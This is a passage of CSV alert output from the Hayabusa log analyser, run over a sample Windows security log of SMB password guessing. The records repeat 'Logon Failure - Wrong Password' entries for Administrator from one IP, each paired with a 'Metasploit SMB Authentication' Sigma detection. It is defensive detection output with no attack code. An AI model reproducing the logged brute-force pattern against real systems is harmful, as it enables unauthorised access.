Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:02.497 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qiJeLgInEkHffefo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:02.497 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:02.547 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: yWyguWQP2iYUArhD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:02.547 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:02.595 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: vDa3GqsTMMXguFhi : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:02.595 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:02.645 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Lr0lkAcdnji1zjW4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:02.645 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:02.693 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4WfNFd5MkQxaxHGP : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:02.693 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:02.741 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: j8hdPhtxP4Ds65yV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:02.741 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:02.793 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: y2BBoWoXWXuRysTx : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:02.793 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:02.884 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6GEhZ2BduHwjJj9H : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:02.884 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:02.927 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GbwEHQCAUJd64LlA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:02.927 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:02.967 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wGfoObbN8ioefyce : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:02.967 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:03.009 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: iLHhCgHvmOzoLLqG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:03.009 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:03.050 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: v9KL69y47DMyFOWT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:03.050 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:03.098 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ECuVYiqdMw2dMjT6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:03.098 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:03.150 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: YJCYumRekD7AREYQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:03.150 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:03.196 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0H4OxKzoemZrsosT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:03.196 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:03.238 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wSHnvxa0khWdWBVx : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:03.238 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:03.288 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bJkPp0bghDCPYz52 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:03.288 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:03.333 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SfHRWGXjCej9HSPb : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:03.333 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:03.383 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: X42H7EvrvzsRqXWO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:03.383 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:03.432 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: moo42NdOq30Gnz3T : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:03.432 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:03.475 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: A4NHVYxxDkCOsQw8 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:03.475 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:03.524 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: iPUiW0vFQB405kwS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:03.524 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:03.573 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OtcZ4ymkeLHeU7YJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:03.573 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:03.620 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ZxZCDKWtqkGJ0dnw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:03.620 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:03.666 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: f4GGnhttZgmRPRJo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:03.666 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:03.716 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gI0j9w45eXEFeex3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:03.716 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:03.764 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BVZ2YRDUAOsNgKxo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:03.764 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:03.822 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VJfIpxlcwVf7pWga : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:03.822 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:03.858 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Oerixd9ODF6fslsC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:03.858 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:03.920 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: sbJC5yvrIymYgaHY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:03.920 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:03.951 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4schZcUP8Im8Ee1e : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:03.951 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:03.988 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: WotargyGlEq9PBch : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:03.988 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:04.025 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2JSMrPoucOR0nzlD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:04.025 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:04.064 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jr4w4uoF2DVZ5n9x : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:04.064 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:04.104 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: v319oZIaOBpuf542 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:04.104 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:04.151 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GNRTL9BLlGWMx6dA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:04.151 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:04.192 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zHlDIOZ9B5uY8Rzz : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:04.192 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:04.248 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Dr2bvAue8mr5kagX : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:04.248 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:04.284 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pXBds9GoXr6IZUfp : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:04.284 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:04.327 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: aLYuegjXO18lo342 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:04.327 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:04.367 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: To3MMEEvNXKNjKHT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:04.367 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:04.416 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: N0HCToTmh3ESGBYt : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:04.416 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:04.455 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nNvBueVo3ANNmSSN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:04.455 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:04.499 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mVWOoAG5ermGL2Gl : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:04.499 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:04.545 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: W7QYJUNPm5b4jprh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:04.545 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:04.590 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PHllwNJvpH3P97cp : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:04.590 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:04.632 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tfT8GtafHGYMlkMf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:04.632 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB 